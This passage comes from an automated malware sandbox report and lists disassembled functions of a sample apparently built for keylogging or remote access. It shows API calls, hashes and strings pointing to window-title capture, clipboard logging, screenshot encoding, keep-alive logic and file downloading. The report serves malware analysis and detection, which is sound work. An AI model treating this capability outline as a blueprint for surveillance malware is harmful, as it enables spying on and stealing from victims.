                                                                                                                                                                      • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 0040A573
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                    • String ID: [ $ ]
                                                                                                                                                                    • API String ID: 3309952895-93608704
                                                                                                                                                                    • Opcode ID: 4c3b9bacc57519028fcd34de768ed373910ab361816e09fd73b4648e02698e55
                                                                                                                                                                    • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                                                                                                                                                    • Opcode Fuzzy Hash: 4c3b9bacc57519028fcd34de768ed373910ab361816e09fd73b4648e02698e55
                                                                                                                                                                    • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041B7FF Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 188215759-0
                                                                                                                                                                    • Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                                                                                                                                    • Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
                                                                                                                                                                    • Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                                                                                                                                    • Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                                                                                                                    • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                                                                                                                                                    • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                                                                                                                    • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                                                                                                                    • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                                                                                                                                                    • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                                                                                                                    • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                                                                                                                                                    • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                    • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                                                                                                                    • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                                                                                                                                                    • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                                                                                                                    • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C5CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,274C1D66,00000000,00000000,?,274C5C88,274C1D66,00000000,00000000,00000000,?,274C5E85,00000006,FlsSetValue), ref: 274C5D13
                                                                                                                                                                    • GetLastError.KERNEL32(?,274C5C88,274C1D66,00000000,00000000,00000000,?,274C5E85,00000006,FlsSetValue,274CE190,FlsSetValue,00000000,00000364,?,274C5BC8), ref: 274C5D1F
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,274C5C88,274C1D66,00000000,00000000,00000000,?,274C5E85,00000006,FlsSetValue,274CE190,FlsSetValue,00000000), ref: 274C5D2D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                    • Opcode ID: 79ea7f0ac1a77eb270addc01f936d4a24e4175c76bdd9d0c7bb23a2b29937300
                                                                                                                                                                    • Instruction ID: d7300e501b40e3e4aecc2fd0fa1cdd1fdc0b80d05d163ba6beeab750324ee049
                                                                                                                                                                    • Opcode Fuzzy Hash: 79ea7f0ac1a77eb270addc01f936d4a24e4175c76bdd9d0c7bb23a2b29937300
                                                                                                                                                                    • Instruction Fuzzy Hash: E401F039611332EBD311CA6A9C4DE8AB798AF456A5B20462CF539D7244DB28D441CAD0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                                                                                                                                                      • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00439891
                                                                                                                                                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                                                                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2633735394-0
                                                                                                                                                                    • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                    • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                                                                                                                                                    • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                    • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                                                                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                                                                                                                                                    • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                                                                                                                                                    • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4116985748-0
                                                                                                                                                                    • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                                    • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                                                                                                                                                    • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                                    • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                                                                                                                                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                                                                                                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                                                                                                                                                      • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                                                                                                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1761009282-0
                                                                                                                                                                    • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                                    • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                                                                                                                                                    • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                                    • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                                                                    • String ID: pow
                                                                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                                                                    • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                                                                                                                                    • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                                                                                                                                                    • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                                                                                                                                    • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00418A92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418ABE
                                                                                                                                                                      • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                                                                                                                                    • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                                                                                                                                                                      • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                                                                                                                                      • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                    • String ID: image/jpeg
                                                                                                                                                                    • API String ID: 1291196975-3785015651
                                                                                                                                                                    • Opcode ID: d9a19672ec4dc75711255ce94c2c2311e4e29857de9186f34d814f6d2a4cbe43
                                                                                                                                                                    • Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
                                                                                                                                                                    • Opcode Fuzzy Hash: d9a19672ec4dc75711255ce94c2c2311e4e29857de9186f34d814f6d2a4cbe43
                                                                                                                                                                    • Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 0040B797
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Init_thread_footer__onexit
                                                                                                                                                                    • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                                                    • API String ID: 1881088180-3686566968
                                                                                                                                                                    • Opcode ID: 9aa95a32f3afd18c73a55cc462cca412e73d5fbf7f0315d28edabe158aabcb31
                                                                                                                                                                    • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                                                                                                                                                    • Opcode Fuzzy Hash: 9aa95a32f3afd18c73a55cc462cca412e73d5fbf7f0315d28edabe158aabcb31
                                                                                                                                                                    • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetACP.KERNEL32(?,20001004,?,00000002), ref: 00451C12
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                    • API String ID: 0-711371036
                                                                                                                                                                    • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                                                                                                                                    • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                                                                                                                                                    • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                                                                                                                                    • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00418B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BAA
                                                                                                                                                                      • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                                                                                                                                    • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418BCF
                                                                                                                                                                      • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                                                                                                                                      • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                    • String ID: image/png
                                                                                                                                                                    • API String ID: 1291196975-2966254431
                                                                                                                                                                    • Opcode ID: d4f259a593197f1d9dbe7f79535cfb99d89987488e7eb69950e532603a38181c
                                                                                                                                                                    • Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
                                                                                                                                                                    • Opcode Fuzzy Hash: d4f259a593197f1d9dbe7f79535cfb99d89987488e7eb69950e532603a38181c
                                                                                                                                                                    • Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                                                                                                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                                                                                                                                                    Strings
                                                                                                                                                                    • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LocalTime
                                                                                                                                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                    • API String ID: 481472006-1507639952
                                                                                                                                                                    • Opcode ID: 476cd4744044a21d670326b2e6a2e061cde7cb4bd516daf39f93a16a014a5405
                                                                                                                                                                    • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                                                                                                                                                    • Opcode Fuzzy Hash: 476cd4744044a21d670326b2e6a2e061cde7cb4bd516daf39f93a16a014a5405
                                                                                                                                                                    • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32 ref: 00416640
                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
